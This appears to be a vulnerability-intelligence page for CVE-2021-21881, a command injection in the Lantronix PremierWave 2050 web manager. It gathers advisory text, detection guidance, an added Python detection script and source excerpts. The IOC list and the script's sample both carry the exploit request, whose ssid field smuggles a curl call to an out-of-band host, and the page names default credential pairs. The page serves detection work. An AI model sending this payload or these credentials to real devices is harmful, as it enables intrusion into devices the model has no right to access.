CVE-2021-21881
Published: 2021-12-22
Priority: P1 · 86 · Critical 9.9 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:C / C:H / I:H / A:H
ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 37.06% (98.3rd percentile)
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lantronix | premierwave_2050_firmware | — | — |
Detection & IOCs (extracted from sources)
URL: POST / HTTP/1.1 with ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
Detection guidance:
- Detect exploitation attempts by monitoring POST requests to the root path (/) containing the 'ajax=WLANScanSSID' parameter combined with shell metacharacters in the 'ssid' field (e.g., single quotes, semicolons, backticks).
- The exploit uses HTTP Basic Authentication with hardcoded credentials. Monitor for the Base64 values 'dXNlcjp1c2Vy' (user:user) and 'YWRtaW46UEFTUw==' (admin:PASS) in Authorization headers targeting Lantronix PremierWave devices.
- The vulnerability is triggered via the Web Manager Wireless Network Scanner endpoint. Look for POST requests with Content-Type: application/x-www-form-urlencoded containing 'Scan=Scan' and a malformed 'ssid' parameter carrying OS command injection payloads.
- Out-of-band detection: successful exploitation causes the device to issue an outbound HTTP request (e.g., via curl) with a randomized User-Agent header. Monitor for unexpected outbound HTTP connections from Lantronix PremierWave 2050 devices.
- The nuclei template uses stop-at-first-match with two credential pairs, indicating attackers may try both 'user:user' and 'admin:PASS' sequentially. Alert on multiple rapid authenticated POST requests to the same Lantronix device root path.
Caveats:
- Exploitation requires prior authentication. The template tests two hardcoded credential pairs (user:user and admin:PASS), but real-world attackers may use other valid credentials. Detection rules should not rely solely on these specific credential values.
- The User-Agent value used in the injected curl command is randomized per scan (rand_base(6)), so it cannot be used as a static IOC for network detection without dynamic correlation.
- The vulnerability is specific to Lantronix PremierWave 2050 firmware version 8.9.0.0R4. Detection rules should be scoped to this CPE to avoid false positives.
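Added example, not code from this page or from any of the cited sources: a small Python checker that applies the detection guidance above to raw HTTP requests. It flags a POST to / whose form body carries ajax=WLANScanSSID with shell metacharacters in ssid, and separately flags the two Base64 Basic-auth values named above (a weak signal on its own, per the caveats). The sample requests are constructed here; the exploit body is the one quoted in the IOC list with the nuclei placeholders left in place, and the host address, the non-default credential and the helper names are assumptions.

```python
"""Detection helper for CVE-2021-21881 exploitation attempts (added example)."""
import base64
import re
from urllib.parse import unquote_plus

# Shell metacharacters that have no place in a Wi-Fi SSID submitted to the scanner form.
SHELL_META = re.compile(r"[;'`|&$]")

# Base64 Basic-auth values called out in the nuclei template (user:user, admin:PASS).
KNOWN_DEFAULT_CREDS = {"dXNlcjp1c2Vy", "YWRtaW46UEFTUw=="}


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into a {name: value} dict.
    Splitting only on '&' (not ';') keeps an injected ';' inside the ssid value
    intact instead of treating it as a parameter separator."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def parse_request(raw: str) -> dict:
    """Minimal parser for a raw HTTP/1.1 request: request line, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def inspect_request(raw: str) -> dict:
    """Return findings for one request; an empty dict means nothing matched."""
    req = parse_request(raw)
    findings = {}
    form = parse_form_body(req["body"])
    path = req["path"].split("?", 1)[0]
    if req["method"] == "POST" and path == "/" and form.get("ajax") == "WLANScanSSID":
        ssid = form.get("ssid", "")
        if SHELL_META.search(ssid):
            findings["command_injection_in_ssid"] = ssid
    auth = req["headers"].get("authorization", "")
    if auth.startswith("Basic "):
        token = auth[len("Basic "):]
        if token in KNOWN_DEFAULT_CREDS:
            findings["default_credentials"] = base64.b64decode(token).decode()
    return findings


# Constructed sample requests (not captured traffic). The exploit body is the one quoted
# in the IOC list; {{interactsh-url}} and {{useragent}} are the nuclei template's placeholders.
_EXPLOIT_BODY = ("ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3"
                 "&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #")


def _request(auth_b64: str, body: str) -> str:
    """Build a raw POST / request to an assumed device address (192.0.2.10)."""
    return ("POST / HTTP/1.1\r\n"
            "Host: 192.0.2.10\r\n"
            f"Authorization: Basic {auth_b64}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n" + body)


BENIGN_SCAN = _request(base64.b64encode(b"operator:example").decode(),  # assumed non-default credential
                       "ajax=WLANScanSSID&Scan=Scan&netnumber=1&ssid=Office+WLAN+5GHz")
EXPLOIT_ATTEMPT = _request("dXNlcjp1c2Vy", _EXPLOIT_BODY)
ADMIN_DEFAULT_CREDS = _request("YWRtaW46UEFTUw==",
                               "ajax=WLANScanSSID&Scan=Scan&netnumber=1&ssid=Guest-WiFi")

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_SCAN), ("exploit", EXPLOIT_ATTEMPT),
                       ("admin-default", ADMIN_DEFAULT_CREDS)):
        print(label, inspect_request(raw) or "no findings")
```

The two signals are reported separately so a rule can weight them differently: the metacharacter check on ssid is the one tied to the vulnerable code path, while the credential match only says a default pair was tried.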
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.9 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| nvd | v3.0 | 9.9 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| vulncheck | — | 9.9 | CRITICAL | — |
GHSA
GHSA-fm7j-3jwj-3cr6 · ghsa_unreviewed · 2021-12-23 · CVE-2021-21881 [CRITICAL] · CWE-78
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
VulnCheck
CVE-2021-21881 [CRITICAL] · vulncheck · 2021 · CVSS 9.9
lantronix premierwave_2050_firmware: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Affected: lantronix premierwave_2050_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/
- https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators
No detection rules found.
Nuclei
CVE-2021-21881 [CRITICAL] · nuclei · CVSS 9.9
Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command execution in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Template:
```yaml
id: CVE-2021-21881

info:
  name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
  author: gy741
  severity: critical
  description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command execution in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
  impact: |
    Successful exploitation of this vulnerabi
```
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
CVE-2021-20166 [HIGH] · blogs_unit42 · 2022-08-19 · CVSS 8.8
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Tags: Trend Reports, Vulnerabilities, Attack analysis, Exploit in the wild, Network security trends
CVEs covered: CVE-2021-20166, CVE-2021-20167, CVE-2021-21881, CVE-2021-24762, CVE-2021-28169, CVE-2021-31589, CVE-2021-39226, CVE-2021-4045, CVE-2021-43711, CVE-2022-21371, CVE-2022-21662, CVE-2022-22536, CVE-2022-22947, CVE-2022-22954, CVE-2022-22963, CVE-2022-22965, CVE-2022-24112, CVE-2022-24260, CVE-2022-25060, CVE-2022-25075, CVE-2022-25134, CVE-2022-27226, CVE-2022-29464
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ
Talos
Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
[CRITICAL] · blogs_talos · 2021-11-15 · CVSS 9.9
## Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
Matt Wiseman discovered these vulnerabilities.
Cisco Talos recently discovered multiple vulnerabilities in Lantronix’s PremierWave 2050, an embedded Wi-Fi module.
There are several vulnerabilities in PremierWave 2050’s Web Manager, a web-accessible application that allows users to configure settings for the 2050 gateway. An attacker could exploit some of these vulnerabilities to carry out a range of malicious actions, including executing arbitrary code and deleting or replacing files on the targeted device. Twelve of these vulnerabilities could allow a malicious user to manipulate the Web Manager in a way — for example, overflowing a fixed-size buffer — that would allow them to execute arbitrary code. These vulnerabilities all require the attacker to authenticate to the Web Manager first
Greynoiseio
NoiseLetter January 2025
blogs_greynoiseio